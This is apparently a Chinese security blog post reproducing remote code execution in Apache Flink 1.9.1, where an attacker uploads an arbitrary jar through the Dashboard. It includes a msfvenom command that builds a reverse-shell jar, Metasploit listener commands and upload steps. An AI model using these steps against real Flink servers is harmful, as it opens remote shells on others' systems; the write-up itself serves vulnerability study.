【漏洞复现】Apache Flink 任意 Jar 包上传致 RCE

  • 内容
  • 相关

0x00 简介

Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。

0x01 漏洞概述

攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。

0x02 影响版本

至目前最新版本Apache Flink 1.9.1

0x03 环境搭建

测试环境:Flink 1.9.1 java8+
Apache Flink 1.9.1安装包下载
https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz


解压后进入bin文件夹,运行./start-cluster.sh
验证Flink启动之后,默认web 端口8081是否正常

1.png

访问http://ip:8081/可看到环境页面

2.png

0x04 漏洞利用

1、上传msf生成的jar包
生成rce.jar文件
msfvenom -p java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8087 -f jar > rce.jar


3.png

2、配置msf监听
use exploit/multi/handler
set payload java/shell/reverse_tcp
set LHOST 127.0.0.1
set LPORT 8087
show options
run


4.png

在Submit New Job处上传rec.jar文件,点击submit

5.png

成功反弹shell,执行id可看到结果

6.png

0x05 修复方式

等待官网更新补丁或等待官网出最新版本后及时更新

本文标签:

版权声明:若无特殊注明,本文皆为《T0ex4》原创,转载请保留文章出处。

本文链接:【漏洞复现】Apache Flink 任意 Jar 包上传致 RCE - https://www.k1q.cn/post-70.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注